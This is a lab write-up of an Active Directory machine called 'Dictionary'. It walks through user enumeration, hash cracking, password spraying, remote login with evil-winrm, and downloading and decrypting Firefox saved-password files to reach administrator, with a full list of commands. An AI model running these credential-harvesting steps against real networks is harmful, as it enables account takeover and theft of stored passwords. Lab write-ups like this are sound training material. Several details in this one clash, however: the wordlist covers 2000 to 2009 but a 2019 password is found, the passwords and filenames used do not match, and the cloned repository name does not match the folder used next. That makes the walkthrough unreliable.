Premise
In this video walkthrough, we went over a Windows Active Directory lab where we demonstrated the enumeration and privilege escalation through a complete method of password enumeration and extraction. We performed privilege escalation by decrypting a Firefox profile to extract passwords.
Machine Name: Dictionary
Difficulty: Medium
Skills Learned
- Kerbruting
- Kerberoasting
- Password Spraying
- Firefox passwords retrieval
Finding the First Foothold
My first step was to find a valid user on the system. I started by using tools like nmap
and kerbrute
to see what user accounts I could find. Initially, I only found one user: “isabel“.
With a username in hand, I tried a technique called Kerberoasting. I used a script called getnpusers.py
to request a special kind of Kerberos ticket for “isabel”. I was in luck! I got a hash that I could try to crack offline.
I then used the password cracking tool john
with a common wordlist to crack the hash. It didn’t take long to find the password: “june2013“.
HHowever, when I tried to log in as “isabel” with this password, it didn’t work. This meant I had to dig a little deeper.
Expanding My Attack Surface
I went back to enumerating users, but this time I used a tool called rpcclient
. This gave me a lot more information, and I was able to find several other users, including “backupisabel“.
Now, here’s where I had a bit of an “aha!” moment. The machine was named “Dictionary,” and the password I found was “june2013”. I had a hunch that other passwords might follow the same “monthyear” pattern.
To test this theory, I created a custom wordlist of passwords that followed this pattern, from January 2000 all the way to December 2009. Then, I used a tool called crackmapexec
to try all of these passwords against the list of users I had found.
It worked! I found that the user “backupisabel” had the password “october2019“. With these new credentials, I was able to log in to the machine.
From User to Administrator
Now that I was in, I needed to find a way to become the administrator. I ran a script called winpeas.exe
, which scans the system for potential ways to escalate privileges.
winpeas
pointed me to a very interesting find: a Firefox password database. I navigated to the Firefox profile directory on the remote machine and downloaded the necessary files: key4.db
, logins.json
, search.json.mozlz4
, and cookies.sqlite
.
Back on my own machine, I used a Python tool called firefox_decrypt
to extract the passwords from these files. This gave me a list of saved passwords, and one of them looked like it might be for the administrator account.
I used crackmapexec
again to test these new passwords against the “administrator” account, and I found the correct one. With the administrator’s password in hand, I was able to log in and complete the challenge.
Technical Commands Used
Here’s a list of the commands I used to compromise this machine:
- User Enumeration:
sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=dictionary.htb,userdb=/usr/share/wordlists/seclists/Usernames/names.txt 172.31.3.4
./kerbrute userenum --dc 172.31.3.4 /usr/share/wordlists/seclists/Usernames/names.txt
sudo nmap -sV --script ldap-search 172.31.3.4
sudo rpcclient 172.31.3.4 -U isabel%getmein
querydominfo
- Password Cracking and Authentication:
getnpusers.py -usersfile users.txt dictionary.htb
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
crackmapexec smb 172.31.3.4 -u users.txt -p pass.txt
- Privilege Escalation and Data Exfiltration:
sudo evil-winrm -i 172.31.3.4 -u backupisabel -p 'October2019'
sudo evil-winrm -i 172.31.3.4 -u administrator -p 'P@$$w0rd'
whoami /priv
whoami /all
cd Documents
cd AppData
cd Roaming
cd Mozilla
cd Firefox
cd Profiles
dir
download key4.db
download logins.json
download cert9.db
download cookies.sqlite
sudo mv key4.db cert9.db cookies.sqlite logins.json firefox_ps
cd firefox_ps
git clone https://github.com/lclevy/firefoxy.git
cd firefox-decrypt
sudo python3 firefox_decrypt.py -p /home/kali/firefox_ps